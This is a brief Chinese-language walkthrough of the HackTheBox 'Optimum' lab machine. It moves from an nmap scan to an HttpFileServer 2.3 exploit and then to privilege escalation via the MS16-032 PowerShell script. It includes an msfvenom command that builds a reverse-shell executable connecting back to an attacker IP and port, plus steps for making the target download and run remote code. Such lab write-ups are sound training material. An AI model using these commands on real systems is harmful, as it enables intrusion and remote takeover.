Optimum - HackTheBox

nmap扫描

访问80端口

HttpFileServer 2.3

有了版本和名字，搜一下有无exp

将ip修改一下

提权

尝试过后最终MS16-032可用

https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Invoke-MS16-032.ps1

将powershell脚本让靶机远程请求执行

导入MS16-032

这个问题是由于反弹的shell是32位的，而这个提权工具则是需要64位运行，修改一下反弹的powershell，让其反弹64位的shell

C:\Windows\sysnative\WindowsPowerShell\\v1.0\powershell.exe

貌似直接执行不行，msf生成一个反弹shell后门，在修改提权脚本，让其执行msf后门

msfvenom -p windows/shell_reverse_tcp lhost=10.10.14.17 lport=7777 -f exe -o rever.exe

让靶机下载

修改提权脚本